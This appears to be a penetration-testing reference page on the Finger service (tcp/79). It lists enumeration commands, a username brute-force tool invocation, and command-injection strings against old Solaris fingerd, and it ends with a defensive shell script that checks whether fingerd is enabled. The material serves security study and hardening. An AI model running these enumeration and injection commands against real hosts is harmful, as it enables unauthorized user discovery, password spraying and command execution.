Finger
Legacy user-information protocol on 79. Leaks valid usernames, who's logged in, and home/shell details — a quick way to build a user list for spraying, and some daemons allow command injection.
Ports
| Port | Proto | Notes |
|---|---|---|
| 79 | tcp | finger |
Fingerprint
- nmap finger script returns user info
- Raw `finger @host` lists logged-in users
Exploitation primitives
- Enumerate valid users (feeds password spraying) with finger-user-enum
- Query a specific user for home dir / shell / last login
- Some Solaris fingerd builds allow command injection via `finger 'user; cmd'@host`
Overview
Finger on 79 answers “who is this user / who’s online”. It’s almost never seen in the wild now, but on CTF/older boxes it’s a free username list.
Enumeration
List logged-in users:
```
finger @<TARGET>
```
Query a specific user:
```
finger root@<TARGET>
```
nmap script:
```
nmap -p79 --script finger <TARGET>
```
Brute-force valid usernames into a list:
```
finger-user-enum.pl -U /usr/share/seclists/Usernames/names.txt -t <TARGET>
```
Command injection (old Solaris fingerd)
```
finger "|/bin/id@<TARGET>"
```
Hardening
Disable fingerd entirely — there’s no modern reason to run it.
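To confirm it is actually off, here is an added example (not from the original page) that checks the usual places a finger service gets enabled: an inetd.conf entry, an xinetd service file, and a listener on tcp/79. The default paths `/etc/inetd.conf` and `/etc/xinetd.d/finger` and all function names are assumptions; systemd socket units are not covered.

```sh
#!/bin/sh
# Added example: check whether fingerd is still enabled on a host.
# Default paths are the conventional inetd/xinetd locations (assumption);
# pass other paths to audit copies of the files.

# Exit 0 if an uncommented "finger" service line exists in an inetd.conf-style file.
inetd_finger_enabled() {
    [ -r "$1" ] || return 1
    awk '!/^[ \t]*#/ && $1 == "finger" { found = 1 } END { exit !found }' "$1"
}

# Exit 0 if an xinetd file has a "service finger" block without "disable = yes".
xinetd_finger_enabled() {
    [ -r "$1" ] || return 1
    awk '
        /^[ \t]*#/ { next }
        $1 == "service" { in_svc = ($2 == "finger"); off = 0; next }
        in_svc && tolower($0) ~ /^[ \t]*disable[ \t]*=[ \t]*yes/ { off = 1 }
        in_svc && index($0, "}") { if (!off) enabled = 1; in_svc = 0 }
        END { exit !enabled }
    ' "$1"
}

# Reads `ss -ltn` output on stdin; exit 0 if any local address ends in :79.
listening_on_79() {
    awk '$4 ~ /:79$/ { found = 1 } END { exit !found }'
}

# Run all checks; print findings and return 1 if finger is enabled or listening.
audit_finger() {
    inetd_conf=${1:-/etc/inetd.conf}
    xinetd_file=${2:-/etc/xinetd.d/finger}
    rc=0
    if inetd_finger_enabled "$inetd_conf"; then
        echo "FAIL: finger enabled in $inetd_conf"; rc=1
    fi
    if xinetd_finger_enabled "$xinetd_file"; then
        echo "FAIL: finger enabled in $xinetd_file"; rc=1
    fi
    if command -v ss >/dev/null 2>&1 && ss -ltn | listening_on_79; then
        echo "FAIL: a service is listening on tcp/79"; rc=1
    fi
    if [ "$rc" -eq 0 ]; then echo "OK: no finger service found"; fi
    return "$rc"
}
```

Source the file and run `audit_finger` with no arguments on the host, or pass two file paths to check collected configuration offline.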